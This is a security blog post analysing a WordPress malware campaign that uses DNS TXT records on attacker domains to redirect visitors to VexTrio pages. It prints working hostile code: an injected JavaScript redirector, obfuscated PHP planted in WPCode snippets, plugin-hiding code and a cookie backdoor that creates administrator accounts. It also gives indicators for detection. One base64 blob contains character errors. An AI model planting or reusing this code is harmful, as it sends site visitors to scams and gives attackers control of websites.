{"id":351,"date":"2024-05-04T10:39:39","date_gmt":"2024-05-04T10:39:39","guid":{"rendered":"https:\/\/elyspace.com\/blog\/?p=351"},"modified":"2024-06-21T09:10:37","modified_gmt":"2024-06-21T09:10:37","slug":"javascript-malware-tactics-tds-server-side","status":"publish","type":"post","link":"https:\/\/elyspace.com\/blog\/javascript-malware-tactics-tds-server-side\/","title":{"rendered":"JavaScript Malware Tactics: TDS, Server-Side Redirects &amp; DNS TXT Records"},"content":{"rendered":"\n<p>JavaScript Malware Tactics: There&#8217;s a new harmful campaign attacking WordPress sites. It added dangerous JavaScript code to these sites, which then sent visitors to harmful VexTrio domains. What&#8217;s interesting about this malware is that it used dynamic DNS TXT records from the tracker-cloud[.]com domain to get new redirect URLs.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"540\" src=\"https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1.jpg\" alt=\"Image: Ensure you're a human by simply tapping on the &quot;allow' button.\" class=\"wp-image-374\" srcset=\"https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1.jpg 960w, https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1-300x169.jpg 300w, https:\/\/elyspace.com\/blog\/wp-content\/uploads\/2024\/05\/Copy-of-Copy-of-1-768x432.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>Since then, we&#8217;ve observed how the campaign is changing the way it hides its actions and the domain names it uses to direct traffic.<\/p>\n\n\n\n<p>In March, there was a major change when the campaign started redirecting traffic through the server instead of the client side.<\/p>\n\n\n\n<p>In this article, we will explore these recent changes in methods and functions. 
We will also highlight common signs of a security breach and malicious domains to be cautious of. Plus, we will offer steps to reduce the risk and protect your website and server from these threats.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Exploring_Scope_and_Detection\"><\/span>Exploring Scope and Detection<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Infections peaked in February 2024, when 9,222 sites were infected in that month alone. 
Right now, a URLScan.io search shows that thousands of websites are still infected with this malware.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"DNS_Traffic_Distribution_System_TDS_Domain_Names\"><\/span>DNS Traffic Distribution System (TDS) Domain Names<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>The following domain names serve as the Traffic Distribution System (TDS); each runs its own dynamic DNS resolver:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>cloud-stats[.]com<\/strong>: created on March 13, 2024; in use since March 13, 2024.<\/li>\n\n\n\n<li><strong>host-stats[.]io<\/strong>: created on March 5, 2024; in use since March 5, 2024.<\/li>\n\n\n\n<li><strong>logsmetrics[.]com<\/strong>: created on December 6, 2023; in use since December 18, 2023.<\/li>\n\n\n\n<li><strong>ads-promo[.]com<\/strong>: created on August 23, 2023; in use since October 13, 2023.<\/li>\n\n\n\n<li><strong>tracker-cloud[.]com<\/strong>: created on July 12, 2023; in use since July 17, 2023.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Redirects_On_Client-side\"><\/span>Redirects On Client-side<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Here&#8217;s the latest iteration of the client-side injection: a script tag whose source is a base64-encoded data: URL, injected into the pages of compromised sites. 
Take a closer look at how malicious scripts are injected into web pages, posing a serious threat to online security.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-b3ca23064ecdda960072e4f479cf43c6\" style=\"background-color:#310549\">&lt;script src=\"data:text\/javascript;base64, KGZ1bmN0aW9uIChwYXJhbWV0ZXJzKSB7DQogICAgZm<br>V0Y2goJ2h0dHBz0i8vYXBpNjQuaXBpZnkub3JnP2Zvcm1hdD1qc29uJykudGhlbihyZXNwb25zZSA9PiByZ<br>XNwb25zZS5qc29uKCkpLnRoZW4oDQogICAgICAgIGlwIDO+IHsNCiAgICAgICAgICAgIGxldCBob3N0ID0g<br>d2luZG93LmxvY2F0aW9uLmhvc3RuYW1l0w0KICAgICAgICAgICAgaXAgPSBpcC5pcC5yZXBsYWNlQWxsKCc<br>6JywgJy0nKTsNCiAgICAgICAgICAgIGlwID0gaXAucmVwbGFjZUFsbCgnLicsICctJyk7DQogICAgICAgIC<br>AgICBpZiAoaG9zdCA9PSAiIikgaG9zdCA9ICJ1bmsuY29tIjsNCiAgICAgICAgICAgIGZldGNoKCdodHRwc<br>zovL2Rucy5nb29nbGUvcmVzb2x2ZT9uYW1lPScgKyBob3N0ICsgJy4nICsgaXAgKyAnLicgKyBNYXRoLmZs<br>b29yKE1hdGgucmFuZG9tKCkgKiAxMDI0ICogMTAyNCAqIDEWKSArICcuaG9zdC1zdGF0cy5pbyZ0eXBlPXR<br>4dCcpLnRoZW40cmVzcG9uc2UgPT4gcmVzcG9uc2UuanNvbigpKS50aGVuKGRhdGEgPT4gew0KICAgICAgIC<br>AgICAgICAgIGlmIChkYXRhLkFuc3dlciA9PSBudWxsKSB7DQogICAgICAgICAgICAgICAgICAgIHJldHVyb<br>jsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgdmFyIG8gPSAiIjsNCiAgICAgICAgICAg<br>ICAgICBkYXRhLkFuc3dlci5mb3JFYWNoKGVsZW1lbnQgPT4gew0KICAgICAgICAgICAgICAgICAgICBpZiA<br>oZWxlbWVudC50eXBlID09IDE2KSBvICs9IGVsZW1lbnQuZGF0YTsNCiAgICAgICAgICAgICAgICB9KTsNC\u0130<br>AgICAgICAgICAgICAgICBvIDOgYXRvYihvKTsNCiAgICAgICAgICAgICAgICBpZiAoIW8ubGVuZ3ROKSBYZ<br>XR1cm47DQogICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2Uobyk7DQogICAgICAgICAg<br>ICB9KTsNCiAgICAgICAgfQOKICAgICk7DQp9KSgp\"&gt;&lt;\/script&gt;<\/pre>\n\n\n\n<p>Unraveling the code reveals the utilization of dns.google service to fetch TXT records of dynamically generated subdomains linked to the attacker&#8217;s domain. 
Because the redirect URL comes from a DNS answer rather than from the script itself, the attackers can change the destination at any time without touching the injected code.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-843e2fd479aae928aa3d5b18a64579b5\" style=\"background-color:#310549\">(function (parameters) {<br>    \/\/ 1. learn the visitor's public IP from a third-party service<br>    fetch('https:\/\/api64.ipify.org?format=json').then(response =&gt; response.json()).then(<br>        ip =&gt; {<br>            let host = window.location.hostname;<br>            \/\/ turn the IP into a DNS-label-safe form: 1.2.3.4 becomes 1-2-3-4<br>            ip = ip.ip.replaceAll(':', '-');<br>            ip = ip.replaceAll('.', '-');<br>            if (host == \"\") host = \"unk.com\";<br>            \/\/ 2. query a per-visitor subdomain of the attacker's domain over DNS-over-HTTPS<br>            fetch('https:\/\/dns.google\/resolve?name=' + host + '.' + ip + '.' + Math.floor(Math.random() * 1024 * 1024 * 10) + '.host-stats[.]io&amp;type=txt').then(response =&gt; response.json()).then(data =&gt; {<br>                if (data.Answer == null) {<br>                    return;<br>                }<br>                var o = \"\";<br>                \/\/ 3. concatenate all TXT (type 16) answers<br>                data.Answer.forEach(element =&gt; {<br>                    if (element.type == 16) o += element.data;<br>                });<br>                \/\/ 4. the TXT data is the base64-encoded redirect URL<br>                o = atob(o);<br>                if (!o.length) return;<br>                window.location.replace(o);<br>            });<br>        }<br>    );<br>})();<\/pre>\n\n\n\n<p>Here&#8217;s a typical response from the dns.google server:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-452b698524c9af03fd5de91b4da7aa09\" style=\"background-color:#310549\">{\"Status\":0,\"TC\":false,\"RD\":true,\"RA\":true,\"AD\":false,\"CD\":false,\"Question\":[{\"name\":\"www.[redacted].com.2600-803-a88-1021--21.1369004.host-stats[.]io.\",\"type\":16}],\"Answer\":[{\"name\":\"www.[redacted].com.2600-803-a88-1021--21.1369004.host-stats[.]io.\",\"type\":16,\"TTL\":600,\"data\":\"aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NvMWtpb2lqdnEzMjdoaG45NnYw\"}],\"Comment\":\"Response from 185.161.248[.]253.\"}<\/pre>\n\n\n\n<p>In the data 
parameter, we find a base64-encoded string: aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NvMWtpb2lqdnEzMjdoaG45NnYw. It decodes to the redirect URL: hxxps:\/\/web-hosts[.]io\/?co1kioijvq327hhn96v0.<\/p>\n\n\n\n<p>Since March, web-hosts[.]io has been used consistently as the redirect destination of this campaign. The associated IP address, 185.161.248[.]253 (KISARA-AS, RU), hosts numerous domains involved in this malware&#8217;s redirections.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Redirects_On_Server-side\"><\/span>Redirects On Server-side<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>After March 13, 2024, a new pattern emerged: website visitors were still being redirected to the same destination, web-hosts[.]io, but this time the redirects were executed server-side, without any JavaScript injection.<\/p>\n\n\n\n<p>On investigation, we traced these server-side redirects to a PHP adaptation of the JavaScript injection seen earlier. The attackers embedded a custom code snippet in the WPCode plugin (formerly Insert Headers and Footers by WPBeginner), a popular tool with over 2 million installations according to the official WordPress plugin repository.<\/p>\n\n\n\n<p>WPCode lets site owners add custom JavaScript, HTML, CSS, and PHP snippets to a WordPress site. In this campaign, however, the attackers installed the plugin themselves on sites they had already compromised.<\/p>\n\n\n\n<p>Unlike the earlier JavaScript snippets, the PHP snippets run on the server, so external scanners never see the malicious code; only the redirect itself can be observed. 
Moreover, the Traffic Distribution System (TDS) logic, which tracks visitor IPs, adds another layer of complexity and makes the redirects hard to reproduce.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Malicious_PHP_Snippets_within_WPCode\"><\/span>Malicious PHP Snippets within WPCode<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>This is how the malicious code looks in the WordPress admin interface, where it hides as a WPCode PHP snippet (the code preview cuts it off at the end):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-274b2f8476cea300e159e113c1b9e98e\" style=\"background-color:#310549\">WPCode &gt; Edit Snippet &gt; Untitled Snippet &gt; Code Preview<br><br>&lt;?php<br>$p0=base64_decode('MjMyZThlZTg2MGY3N2VmMDZjNGQ5NWFhZTIzOTU4NGU='); if(current_user_can(base64_decode('YWRtaW5pc3RyYXRvcg=='))&amp;&amp;!array_key_exists(base64_decode('c2hvd19hbGw='),$_GET))<br>{add_action(base64_decode('YWRtaW5fcHJpbnRfc2NyaXB0cw=='),function(){echo base64_decode('PHN0eWxlPg=='); echo base64_decode('I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ=='); echo<br>base64_decode('I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9'); echo<br>base64_decode('I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ=='); echo<br>base64_decode('PC9zdHlsZT4=');}); add_filter(base64_decode('YWxsX3BsdWdpbnM='),function($q1)<br>{<br>unset($q1[base64_decode('aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=')]); return $q1;});}if(!function_exists(base64_decode('X3JlZA==')))<br>{error_reporting(0); ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0); function _gcookie($p2)<br>{return(isset($_COOKIE[$p2]))?<\/pre>\n\n\n\n<p>In the WPCode snippet list these show up as &#8216;Untitled Snippet.&#8217;<\/p>\n\n\n\n<p>The injected code varies slightly from site to site, 
but its core function stays the same. Here is a simple example:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-b748ec0107ad31b2bd21fa05087c3357\" style=\"background-color:#310549\">if(!function_exists(base64_decode('X3JlZA=='))){error_reporting(0); ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='),0);<br>function _is_mobile(){return preg_match(base64_decode('LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p'), $_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}<br>function _is_iphone(){return preg_match(base64_decode('LyhpcGhvbmV8aXBvZCkvaQ=='), $_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);}<br>function _user_ip(){foreach(array(base64_decode('SFRUUF9DRl9DT05ORUNUSU5HX0lQ'), base64_decode('SFRUUF9DTElFTlRfSVA='), base64_decode('SFRUUF9YX0ZPUldBUkRFRF9GT1I='), base64_decode('SFRUUF9YX0ZPUldBUkRFRA=='), base64_decode('SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ'), base64_decode('SFRUUF9GT1JXQVJERURfRk9S'), base64_decode('SFRUUF9GT1JXQVJERUQ='), base64_decode('UkVNT1RFX0FERFI=')) as $c0){if(array_key_exists($c0, $_SERVER)&amp;&amp;!empty($_SERVER[$c0])){foreach(explode(base64_decode('LA=='), $_SERVER[$c0]) as $q1){$q1=trim($q1); if(filter_var($q1, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)!==false){return $q1;}}}}return false;}<br>function _red(){if(!is_user_logged_in()){$q1=_user_ip();if(!$q1){return;}$k2=get_transient(base64_decode('ZXhw')); if(!is_array($k2)){$k2=array();} foreach($k2 as $g3=&gt;$l4){if(time()-$l4&gt;86400){unset($k2[$g3]);}}if(key_exists($q1,$k2)&amp;&amp;(time()-$k2[$q1]&lt;86400)){return;}$y5=filter_var(parse_url(base64_decode('aHR0cHM6Ly8=').$_SERVER[base64_decode('SFRUUF9IT1NU')], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN); $v6=str_replace(base64_decode('Og=='), base64_decode('LQ=='),$q1); $v6=str_replace(base64_decode('Lg=='), base64_decode('LQ=='), $v6); $h7=_is_iphone()?base64_decode('aQ=='):base64_decode('bQ=='); $o8=(!$y5?base64_decode('dW5rLmNvbQ=='):$y5).base64_decode('Lg==').(!$v6?base64_decode('MC0wLTAtMA=='):$v6).base64_decode('Lg==').mt_rand(100000,999999).base64_decode('Lg==').(_is_mobile()?base64_decode('bg==').$h7:base64_decode('bmQ=')).base64_decode('LmNsb3VkLXN0YXRzLmNvbQ=='); $u9=dns_get_record($o8, DNS_TXT); if(is_array($u9)&amp;&amp;!empty($u9)){if(isset($u9[0][base64_decode('dHh0')])){$u9=$u9[0][base64_decode('dHh0')]; $u9=base64_decode($u9); if($u9==base64_decode('ZXJy')){$k2[$q1]=time();set_transient(base64_decode('ZXhw'),$k2);}else if(substr($u9,0,4)==base64_decode('aHR0cA==')){$k2[$q1]=time(); set_transient(base64_decode('ZXhw'),$k2); wp_redirect($u9); exit;}}}}}<br>add_action(base64_decode('aW5pdA=='), base64_decode('X3JlZA=='));}<\/pre>\n\n\n\n<p>More advanced versions take a closer look to spot. 
While they may contain extra code, they stand out through their heavy reliance on base64_decode() for every string.<\/p>\n\n\n\n<p>To find them, scan your database manually for the following suspicious strings:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-7a47ac818ece3a30ca54a4daab5ac40e\" style=\"background-color:#310549\">add_action(base64_decode('aW5pdA=='),base64_decode('X3JlZA=='));<\/pre>\n\n\n\n<p>This decodes to:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-438a3456874150558f1476c7a13c9cb4\" style=\"background-color:#310549\">add_action('init','_red');<\/pre>\n\n\n\n<p>And:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-dc502e6ea2a4dc3d5c9865857cebdf48\" style=\"background-color:#310549\">if(!function_exists(base64_decode('X3JlZA=='))){<\/pre>\n\n\n\n<p>That decodes to:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-efe2a6783ad075406b161821e482bd6a\" style=\"background-color:#310549\">if(!function_exists('_red')){<\/pre>\n\n\n\n<p>Another clear indicator is a call to dns_get_record() with the DNS_TXT flag in code you did not add yourself. dns_get_record() looks up DNS records, and legitimate themes and plugins rarely need to fetch TXT records on every page load; in this malware the call retrieves the redirect URL from the attacker&#8217;s DNS server. If you find such a call, investigate the surrounding code right away, because as long as it stays in place the site keeps redirecting its visitors.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-7b26f26ac64a805f20a4d3658b3a9637\" style=\"background-color:#310549\">dns_get_record($p9,DNS_TXT);<\/pre>\n\n\n\n<p><em>Note: the variable name ($p9 in the example above) varies from site to site, so search for the DNS_TXT flag rather than for the variable.<\/em><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Basic_Functionality_of_Redirect\"><\/span>Basic Functionality of Redirect <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>When decoded, the critical segment of the malware looks like this:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-7a3029f0e8c90a84e069ff86ff52b1b9\" style=\"background-color:#310549\">function _red(){<br>if(!is_user_logged_in()){<br>$q1=_user_ip();<br>if(!$q1){<br>return;<br>}<br>$k2=get_transient('exp'); \/\/ IPs already handled, as IP =&gt; timestamp<br>if(!is_array($k2)){<br>$k2=array();<br>}<br>foreach($k2 as $g3=&gt;$l4){<br>if(time()-$l4&gt;86400){ \/\/ more than 24 hours: forget this IP<br>unset($k2[$g3]);<br>}<br>}<br>if(key_exists($q1,$k2)&amp;&amp;(time()-$k2[$q1]&lt;86400)){ \/\/ less than 24 hours: do not redirect again<br>return;<br>}<br>$y5=filter_var(parse_url('https:\/\/'.$_SERVER['HTTP_HOST'], PHP_URL_HOST), FILTER_VALIDATE_DOMAIN);<br>$v6=str_replace(':','-',$q1);<br>$v6=str_replace('.','-',$v6);<br>$h7=_is_iphone()?'i':'m';<br>$o8=(!$y5?'unk.com':$y5).'.'.(!$v6?'0-0-0-0':$v6).'.'.mt_rand(100000,999999).'.'.(_is_mobile()?'n'.$h7:'nd').'.cloud-stats.com';<br>$u9=dns_get_record($o8,DNS_TXT); \/\/ the TXT record carries the TDS answer<br>if(is_array($u9)&amp;&amp;!empty($u9)){<br>if(isset($u9[0]['txt'])){<br>$u9=$u9[0]['txt'];<br>$u9=base64_decode($u9);<br>if($u9=='err'){ \/\/ TDS declined: remember the IP, no redirect<br>$k2[$q1]=time();<br>set_transient('exp',$k2);<br>}<br>else if(substr($u9,0,4)=='http'){ \/\/ TDS returned a URL: remember the IP and redirect<br>$k2[$q1]=time();<br>set_transient('exp',$k2);<br>wp_redirect($u9);<br>exit;<br>}<br>}<br>}<br>}<br>}<br>add_action('init','_red');<\/pre>\n\n\n\n<p>The last line hooks _red() into the WordPress init action, so the function runs on every page load, before any headers are sent.<\/p>\n\n\n\n<p>The function only proceeds if the visitor is not logged in (so site owners never see the redirect) and has not been seen within the past 24 hours.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"A_Request_related_to_DNS_TXT_Record\"><\/span>A Request related to DNS TXT Record<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>When these conditions are met, the malware builds a unique subdomain of the attacker&#8217;s domain, cloud-stats[.]com, and requests its TXT record:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-b571e9807e089ba7d7c73fccc1cbbaf4\" style=\"background-color:#310549\">$o8=(!$y5?'unk.com':$y5).'.'.(!$v6?'0-0-0-0':$v6).'.'.<strong>mt_rand<\/strong>(100000,999999).'.'.(_is_mobile()?'n'.$h7:'nd').'.cloud-stats[.]com';\n$u9=<strong>dns_get_record<\/strong>($o8,DNS_TXT);<\/pre>\n\n\n\n<p>The generated subdomain is made up of:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The domain name of the infected site (or &#8216;unk.com&#8217; if it cannot be determined)<\/li>\n\n\n\n<li>The IP address of the visitor, with periods and colons replaced by dashes<\/li>\n\n\n\n<li>A random number between 100,000 and 999,999<\/li>\n\n\n\n<li>A platform marker for the visitor&#8217;s device:\n<ul class=\"wp-block-list\">\n<li>&#8216;ni&#8217; for iPhones<\/li>\n\n\n\n<li>&#8216;nm&#8217; for other mobile devices<\/li>\n\n\n\n<li>&#8216;nd&#8217; for desktops (not 
mobile)<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>The attacker-controlled parent domain, cloud-stats[.]com<\/li>\n<\/ul>\n\n\n\n<p>Put together, a generated subdomain looks like this: www.example.com.127-0-0-1.243385.ni.cloud-stats[.]com<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"URL_Redirection_within_TXT_Records\"><\/span>URL Redirection within TXT Records<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Here is a typical response to the malware&#8217;s TXT record request:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-4f54a2d56271f132096385942f2ee8c7\" style=\"background-color:#310549\">type: 16 aHR0cHM6Ly93ZWItaG9zdHMuaW8vP2NucG43YmFqdnEzZTdvNWtxNXQw;<br>type: 2 ns1.cloud-stats[.]com;<br>type: 2 ns2.cloud-stats[.]com;<br>95.216.232.139;185.161.248.253;<\/pre>\n\n\n\n<p>The TXT record (type 16) carries the redirect URL, hxxps:\/\/web-hosts[.]io\/?cnpn7bajvq3e7o5kq5t0, as the base64 string aHR0cHM6Ly93ZWItaG9\u2026. The NS records (type 2) also reveal the IPs of the name servers: the familiar 185.161.248[.]253 (KISARA-AS, RU) and 95.216.232[.]139 (HETZNER-AS, DE).<\/p>\n\n\n\n<p>Once the redirect URL has been fetched from the cloud-stats[.]com DNS server, the visitor is sent there with the wp_redirect function.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Elusive_Techniques_and_Backdoor_Functionality\"><\/span>Elusive Techniques and Backdoor Functionality<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Injected PHP scripts may come with extra functionality. 
One frequent addition is code that hides the WPCode plugin (insert-headers-and-footers\/ihaf.php) from the installed plugins list.<\/p>\n\n\n\n<p>This thwarts detection and deactivation by website owners who did not install the plugin themselves. A side effect is that even legitimate users of the plugin will find it hidden.<\/p>\n\n\n\n<p>To further obscure the WPCode plugin, the malware also hides its menu entries and notices on the WordPress dashboard by injecting styles that set them to { display: none; }.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Backdoor_That_is_Cookie_Based\"><\/span>Backdoor That is Cookie Based<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>Newer versions of the malware add a backdoor that lets the attackers pass commands and data to the script through base64-encoded cookies:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-a75af9397c92626d146438d48062e652\" style=\"background-color:#310549\">function _gcookie($z2){ \/\/ read and base64-decode a cookie, or '' if it is absent<br>return(isset($_COOKIE[$z2]))?base64_decode($_COOKIE[$z2]):'';<br>}<br>if(!empty($d0)&amp;&amp;_gcookie('pw')===$d0){ \/\/ $d0 is the attacker's secret, set earlier in the snippet<br>switch(_gcookie('c')){<br>case 'sd': \/\/ set domain: replace the TDS domain stored in the WordPress options<br>$e3=_gcookie('d');<br>if(strpos($e3,'.')&gt;0){<br>update_option('d',$e3);<br>}<br>break;<br>case 'au': \/\/ add user: create a new administrator account<br>$e4=_gcookie('u');<br>$l5=_gcookie('p');<br>$p6=_gcookie('e');<br>if($e4&amp;&amp;$l5&amp;&amp;$p6&amp;&amp;!username_exists($e4)){<br>$w7=wp_create_user($e4,$l5,$p6);<br>$x8=new WP_User($w7);<br>$x8-&gt;set_role('administrator');<br>}<br>break;<br>}<br>return;<br>}<\/pre>\n\n\n\n<p>The two commands this backdoor accepts are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Dynamic domain update (sd): replaces the primary DNS TDS domain and stores the new one in a WordPress option. A single GET request carrying the right cookies is enough to swap the domain, which keeps the change inconspicuous.<\/li>\n\n\n\n<li>Admin user creation (au): creates a new WordPress user with the administrator role, giving the attackers full control of the site.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Persistence_of_Malware\"><\/span>Persistence of Malware <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>This campaign installs the WPCode plugin on compromised websites and then uses it to inject the attackers&#8217; own JS and PHP code.<\/p>\n\n\n\n<p>Our analysis of logs from several affected sites reveals a consistent pattern. We could not determine which vulnerability gave the attackers their initial access, but the malicious activity starts when they log into WordPress with valid admin credentials and install the WPCode plugin.<\/p>\n\n\n\n<p>The attackers also go to great lengths to keep the malware in place. After infecting a site, their bots revisit it daily, sometimes several times a day, log into WordPress and verify that the WPCode plugin is still active. In one case we observed, a site owner deactivated the plugin, only for the attacker&#8217;s bot to reactivate it two hours later.<\/p>\n\n\n\n<p>The attackers are also experimenting with a similar plugin, &#8216;Head, Footer and Post Injections,&#8217; as a fallback. 
While this plugin serves the same purpose of allowing custom JS and PHP injections, it has yet to become their primary tool.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"User-Agents_and_Proxies\"><\/span>User-Agents and Proxies <span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>The malicious bot requests come from residential IP addresses all over the world, for example from:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mexico<\/li>\n\n\n\n<li>Pakistan<\/li>\n\n\n\n<li>Brazil<\/li>\n\n\n\n<li>Egypt<\/li>\n\n\n\n<li>Thailand<\/li>\n\n\n\n<li>Kenya<\/li>\n\n\n\n<li>Morocco<\/li>\n\n\n\n<li>Serbia<\/li>\n\n\n\n<li>etc.<\/li>\n<\/ul>\n\n\n\n<p>These are most likely compromised computers or public proxies.<\/p>\n\n\n\n<p>The User-Agent strings of these requests vary widely, but they typically claim to be older browser versions:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted has-white-color has-text-color has-background has-link-color wp-elements-2e087a63cb38ab2b87d1d02fa9327ac4\" style=\"background-color:#310549\">\"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/41.0.2228.0 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/54.0.2840.99 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/55.0.2883.87 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/58.0.3029.110 Safari\/537.3\"\n\"Mozlila\/5.0 (Linux; Android 7.0; SM-G892A Bulid\/NRD90M; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/60.0.3112.107 Moblie Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; 
Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/72.0.3626.121 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/72.0.2265.141 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.97 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.132 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/84.0.4147.125 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 6.1; ) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/83.0.4103.116 Safari\/537.36\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/85.0.4183.121 Safari\/537.36 Edg\/85.0.564.70\"\n\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/87.0.4280.67 Safari\/537.36 Edg\/87.0.664.52\"\n\"Mozilla\/5.0 (Windows 